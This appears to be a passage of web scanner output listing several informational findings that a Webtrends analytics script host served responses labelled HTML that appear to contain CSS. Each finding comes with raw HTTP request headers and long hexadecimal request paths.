89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce9b559509e25dfcfbd4009bd0a6ab2fd99dc90968212c30d6909c49c7b7bc8e92cd4efa418cd8d6d7c0c61d01bfa3526d65ecd98f7eabf1e7fd57123a9d9eb4a9a5a135afe7073b1e411ed8ba394ff6540c0f3a2082352ad19978ec7c4215eebb15d7d7642621849e9a30aab127d2173507592feeec01faa3a625881da4921411f46bbd11568a039c7d6d HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=96E1638C7BDB082433E3C6C43599B744

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7439f22d3b9a815f9c722cfa485633f72f3f241d638b524ee2040125118e68eec2e1dc6251cb3c98fab04d25ff4b0fc2f4a99237ea729651afc8bd43ab33eb64c3735a7123a51f7c3fe768690b96b249ad8a9dba4b1630dafd95763f5c7cd88bc890992c71f509fcb147ed116d7e39538dcb714780e6528e17939bba6512ca7216825b4107315270a4b13f0bb9decdd2348b35ab7396cc57c0dab72997b533e4cefd6b1541152dd0837194b47ebb97b26ccd99434a9b4de64791e09ff725c36828bedc60270045b0e9a366fe0666763c333a7bf4d6f182de01e870aa4da3ac241ef3580fa887b63707fd1f08760186781c3ce2ba4ff601a680ee4e4085850f15c63808fe61b99fbd4d12244366a38287b3d1c3a63dfca027d4eb8c266b59d931a5912949c1f199b0505949c654a51a33b388b740ca72b85cb2f939d5f629fe8ed20e9af404b7b5768b113fbdfacc9ae56da069ff7ca4456e2ef2f31c7d4f257a6c51e3d613ed342195c996e327a6b94f79a125485519e934a35150c788f8b3bd3da9479dded12c188f4d5bac3136805876946bddd1cc700e208124b7afafecd34f58e50bad6a6de4a8b2c4adee0eac6ecf6c870c37639dfc72aa1cd58be713ced7b64b7b3f311c06085c4daf9ddb9202d2ef71bfb6a577153d406c4fb5876f3d3246c8daf24e4c091d96443ca4a09019c60f58e648a589b2b26504bc301673e38b69ff73d7d5035d2fac884e433eba4bf065941c143d32f3d984247caad289264b8f59f8a2344e686ed123520e0a61f0374e543b2de3a7b4a7c2b53dee03ef39017042d8e70f9dabb4e61fc05b1a78d4eceb27561348e5ca12f7d80ba9b92c56c53923d3d3f0629212075dbd905273501c825ccda6f31ce9e27f9029c01cb14d2a2aa6733302eb3ff57fdedcb4a041311ed28706378ab8e287be3f253f58020441c7b456c8e0d914a966d2aa08da9c763c0507dbceaf6213f21315956753ace6b9d24bb681a9d319d2b5556eab27a5394f676811baf5c1657894edacc6263b19def2927c7c0969c3ede4b531abe2ab22430dc2c51b55488c9e2ec3e023911831418779a9723f6bb5d4b12b6f42cb0dd8b9f842e193f464c788f29e0b9b2face51a36bc39e81c7ca7cc2483bc1c4c2cf51b0754493a6da88d231e07d9b5b6dd1f7afb5c5f313b50ae631e70aabdd13b93a504bf90780dadbbd0c638ad8c461240f162eafb149b7926e6a0a1be122958f23edbcd8b5b496c26cf5cda6a19dbacefb2f687a8b645956a7bbef426f43fc279ddd1ef32bacc859629f98df227570d4b6f91cf00f4ea6e

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7439f22d3b9a815f9c722cfa485633f72f3f241d638b524ee2040125118e68eec2e1dc6251cb3c98fab04d25ff4b0fc2f4a99237ea729651afc8bd43ab33eb64c3735a7123a51f7c3fe768690b96b249ad8a9dba4b1630dafd95763f5c7cd88bc890992c71f509fcb147ed116d7e39538dcb714780e6528e17939bba6512ca7216825b4107315270a4b13f0bb9decdd2348b35ab7396cc57c0dab72997b533e4cefd6b1541152dd0837194b47ebb97b26ccd99434a9b4de64791e09ff725c36828bedc60270045b0e9a366fe0666763c333a7bf4d6f182de01e870aa4da3ac241ef3580fa887b63707fd1f08760186781c3ce2ba4ff601a680ee4e4085850f15c63808fe61b99fbd4d12244366a38287b3d1c3a63dfca027d4eb8c266b59d931a5912949c1f199b0505949c654a51a33b388b740ca72b85cb2f939d5f629fe8ed20e9af404b7b5768b113fbdfacc9ae56da069ff7ca4456e2ef2f31c7d4f257a6c51e3d613ed342195c996e327a6b94f79a125485519e934a35150c788f8b3bd3da9479dded12c188f4d5bac3136805876946bddd1cc700e208124b7afafecd34f58e50bad6a6de4a8b2c4adee0eac6ecf6c870c37639dfc72aa1cd58be713ced7b64b7b3f311c06085c4daf9ddb9202d2ef71bfb6a577153d406c4fb5876f3d3246c8daf24e4c091d96443ca4a09019c60f58e648a589b2b26504bc301673e38b69ff73d7d5035d2fac884e433eba4bf065941c143d32f3d984247caad289264b8f59f8a2344e686ed123520e0a61f0374e543b2de3a7b4a7c2b53dee03ef39017042d8e70f9dabb4e61fc05b1a78d4eceb27561348e5ca12f7d80ba9b92c56c53923d3d3f0629212075dbd905273501c825ccda6f31ce9e27f9029c01cb14d2a2aa6733302eb3ff57fdedcb4a041311ed28706378ab8e287be3f253f58020441c7b456c8e0d914a966d2aa08da9c763c0507dbceaf6213f21315956753ace6b9d24bb681a9d319d2b5556eab27a5394f676811baf5c1657894edacc6263b19def2927c7c0969c3ede4b531abe2ab22430dc2c51b55488c9e2ec3e023911831418779a9723f6bb5d4b12b6f42cb0dd8b9f842e193f464c788f29e0b9b2face51a36bc39e81c7ca7cc2483bc1c4c2cf51b0754493a6da88d231e07d9b5b6dd1f7afb5c5f313b50ae631e70aabdd13b93a504bf90780dadbbd0c638ad8c461240f162eafb149b7926e6a0a1be122958f23edbcd8b5b496c26cf5cda6a19dbacefb2f687a8b645956a7bbef426f43fc279ddd1ef32bacc859629f98df227570d4b6f91cf00f4ea6e HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0B899B0C1CBB2BD7366E35AD2D5AA510

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1e3b05f9a6f0b729a85efe7adb7fb8cf8eeb771dec2619c6e66228f7e802013802a70bf96b1c3ea19d97efe93fa6fb5ea74b545b1f6369884864c85e279fd5377162ab5cbea2665ceb2710c2aa521889f65cb9f85acd62a48c188452f8d5108fcdb073538598989008ca7f0ba4af4581f6d4a79c2f7c47cdcd7a2552be91b374aea6f476ccb905aa5a3d174e1a634cdb980d9d601c589313678623d87457b45e1f1e908c61532f25e3f94f63afa3f6db67e7007a14a6b7c710a8b5a35e27a0d4500847f80c0ebda463bc83a8189dd1d23b44666c6f0e2e2369b2e8a5dffca9a56c2278975ad05350150d5070b4c817a7105f1cc36df9be0da376750cc8ef217352a0ba380bf9a922864fe1d879913aa3b5d337305caf06e6482e85fb331c3d8ef5b24887216825952132a3d35aff60551fb92a69724812ffe64c7bc44d9cda7109fff75ecdefc7a580b5b015be0a2

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4ecb5eeb972d0fb6d8c27392b8f1fe14354db7a22e4f3f981b902d46ff783e47cf9a720ab7f8ad51ef99c9e5cceaa79b91552041ad9a79a692b84e621103aca09edf9249ed2df83f71d59ccc62356fa5168f2ca0f3f315ffb890f88d686c03ff64f777d5e1bbf9db672ada4c41e75e97a7c7ecc5f7a55ffc64ec4e19639b7820eeab9c3979112afef38467e754391361e4e91e0fc13bf0049e4212e9f91559c63359c257a75a15c6b001172fe4937f705511341db39b094acc560169b6ac1d5ed1752b30b5cd5e8a69d429d698147daacb730cc29fc60d071411a29ce700554cc273d409ac55da6eb9eba491035a7fc9371495675d590c2e2ea0819f20efec52fbc6148654a40d0d5333cdee40bc237d290ef3a55ef0473ee3d3174415824f7e05046e588ffd272df35a074edad59ce95a73fdbfd338a84b97405441e3baacf2880b37eb38bc03b8ec6130e8355f13082f285830ae14702ba6d55

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4f3b2ecaa7b9787268975646c9a6fe12e0dc96b33e5d7f4cfbd4c8b3fb389ac31f4b33b877f9a9e0ab4c5dd1a85e935f84d0f311689f4c87061deb765416dd916a4be71979f8ec8a34c06da9f6274d60a23ad9b1c367b4c85fe0699df97c83df65c6967397bd9edd304b9bcca55469f091879db220e21c48056caf3e341ca810df1dfdb8f8301c58931200004259f201f4ae197f61db2733ce4275be9e72fe1683799230f74c1350a09710efe594ee36a14527ee7039bd0e2c96e0d9d79dacfed1f62fc3c4b92a5f0b96ec20fda11f8dbd256a346ef03c869240646c3700554e268690b9aa736bee58de6154f6dd68f837e5e5476d1fec1e9ec5f73f10cfac52fea671f394a47d58734548db45cc30ad0c0ab24408f351d9809504f3121249a963f2a9ff8cdf343932db86683f208910246bbe0

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dce594e3d0e60b235269895e7baf9502a736d5a84b81ecc7b695dddf3bf515e70b0f61e903d0620220ef995b6766604ecdc6f9cffa4ffef19e7d66baea70381de7df55cf37dbe731091e6cb6a3905f846911248595aff0b1f6f3cdbfe3ac30d9c4678e383536c316f12914894b6effc4f298ac54cb7e8293fd68f6a36780748b8600e6979e42ced92cbc2e742b189ed2de622c89f6711a25da45f7eb77c18d8497be4c1899d26a72dc1268f2931c41435eea87148ad684c83cff5d6d663078d1efc44cf2e303e28add

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29c9119cbec293c0d622b875d417cd18cb343d86f39e9542e91ed43fa6a22e9270074c2457c7a6f7d885f3ef87c0e45039908e9b4e1c61756cf4882f9b44c53e34700d5e8a69d54e50f995fbfbccd42df46ec12c17c571639b3606a4f9a72171192c33eabf899bf391631da8883685e0c3d908399b6b31904b650bd8315aa76147e2553c8915e7d80f265952595abbe344d9a610997284107317e59a3b0425eeb9ba191218221aa6f94bb40dcc1e9249cb774bf98ee7407217244aeec16ffd31ba080c2399fd00053ca13a163a0dea3c21fbe005fb9d10032105be4e1a267f21a6d327c62776a8fd1e687a80aec67ee1af4ed0e54af4f4eeec3f11307fd1f196b76867d6c3ce2cb04a55eb0d1bd080093f61802c730698566b99fbd06410a0371a3c5d0ecb5d4a62a86a51effaadb722705ff70b2911f1e9fe6dfeb180f7bc75bac0f70e8d4f717ae71c849b8fd7885af7cbac98053cfe672a0a206ef123ee1a389dbb537e637b82af0456b58f2f21e694e272e3b17ae8b4dac6e66c088819230b1b87b3bf767190709e232b65522d18aefb0cd28a343dd94806e46d85b59ab2735f94d709363d9d6c3740d2c822da5aeaef9d43f4def09ef3a3ab7f0f79ffffe0ba76ece1f931b46058afc36bc07c392f003d9d7b64b7b3f310816786a06f9cace8e1ec1ee2df9d7b272742c2d6b2f8497730a2341d5d1b5104b6e3cc7060ae8e5dc2b974608f86f949ca5e431439c67403cb3a96ff641869c533250de844f4333b65de07d8c0c6d60369e9283307caad2b3076aa574beba2c5c7877c112480c4a35e22b5c3359409cd1bbabcfb72eed138d2a0a7247d2e40b97a8bcac1fdd5d0578d1f5ea254a1447e6df13f3d309b9f4295cc03c2bd6dce17c9d7b4719e6fd142b3e0a873ca4a4ff739ff9679e39af46f80a30198a0132028a5bef72c9a8aeb75b401dd5937044febef7f5cf4b542529731555c8e1669fbcd66bbd1bb3be6ff0b35e620970dbd8af3e53a64b079e712ebdffab8e1287dfd1a058b7a2076df84ef6381d660411bcf39603779ce8aaad2a610b918f82136c57439bf9ebf439a0eaaa7f400dcfd3024409e7cd7280fb6f8e0944439466b3125200cfb7d03b6145c81982f5b012ec80ec6ab1b7d3ed65ff45ae954d6bbe27fa402ecedc2d9bd8420330ed097839576d2daafe311514b0a1ccc5036e963838572c5ed87b103b8fbdc73b97d004d99e6078b48df5e414fcd9020f0a903cadd733bb526a98e398b2537715cc02e2eaf75c692b7d9951da7333d6b7ebf495d591ac74954c5e98b33eab26d0029628cb

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29c9119cbec293c0d622b875d417cd18cb343d86f39e9542e91ed43fa6a22e9270074c2457c7a6f7d885f3ef87c0e45039908e9b4e1c61756cf4882f9b44c53e34700d5e8a69d54e50f995fbfbccd42df46ec12c17c571639b3606a4f9a72171192c33eabf899bf391631da8883685e0c3d908399b6b31904b650bd8315aa76147e2553c8915e7d80f265952595abbe344d9a610997284107317e59a3b0425eeb9ba191218221aa6f94bb40dcc1e9249cb774bf98ee7407217244aeec16ffd31ba080c2399fd00053ca13a163a0dea3c21fbe005fb9d10032105be4e1a267f21a6d327c62776a8fd1e687a80aec67ee1af4ed0e54af4f4eeec3f11307fd1f196b76867d6c3ce2cb04a55eb0d1bd080093f61802c730698566b99fbd06410a0371a3c5d0ecb5d4a62a86a51effaadb722705ff70b2911f1e9fe6dfeb180f7bc75bac0f70e8d4f717ae71c849b8fd7885af7cbac98053cfe672a0a206ef123ee1a389dbb537e637b82af0456b58f2f21e694e272e3b17ae8b4dac6e66c088819230b1b87b3bf767190709e232b65522d18aefb0cd28a343dd94806e46d85b59ab2735f94d709363d9d6c3740d2c822da5aeaef9d43f4def09ef3a3ab7f0f79ffffe0ba76ece1f931b46058afc36bc07c392f003d9d7b64b7b3f310816786a06f9cace8e1ec1ee2df9d7b272742c2d6b2f8497730a2341d5d1b5104b6e3cc7060ae8e5dc2b974608f86f949ca5e431439c67403cb3a96ff641869c533250de844f4333b65de07d8c0c6d60369e9283307caad2b3076aa574beba2c5c7877c112480c4a35e22b5c3359409cd1bbabcfb72eed138d2a0a7247d2e40b97a8bcac1fdd5d0578d1f5ea254a1447e6df13f3d309b9f4295cc03c2bd6dce17c9d7b4719e6fd142b3e0a873ca4a4ff739ff9679e39af46f80a30198a0132028a5bef72c9a8aeb75b401dd5937044febef7f5cf4b542529731555c8e1669fbcd66bbd1bb3be6ff0b35e620970dbd8af3e53a64b079e712ebdffab8e1287dfd1a058b7a2076df84ef6381d660411bcf39603779ce8aaad2a610b918f82136c57439bf9ebf439a0eaaa7f400dcfd3024409e7cd7280fb6f8e0944439466b3125200cfb7d03b6145c81982f5b012ec80ec6ab1b7d3ed65ff45ae954d6bbe27fa402ecedc2d9bd8420330ed097839576d2daafe311514b0a1ccc5036e963838572c5ed87b103b8fbdc73b97d004d99e6078b48df5e414fcd9020f0a903cadd733bb526a98e398b2537715cc02e2eaf75c692b7d9951da7333d6b7ebf495d591ac74954c5e98b33eab26d0029628cb HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba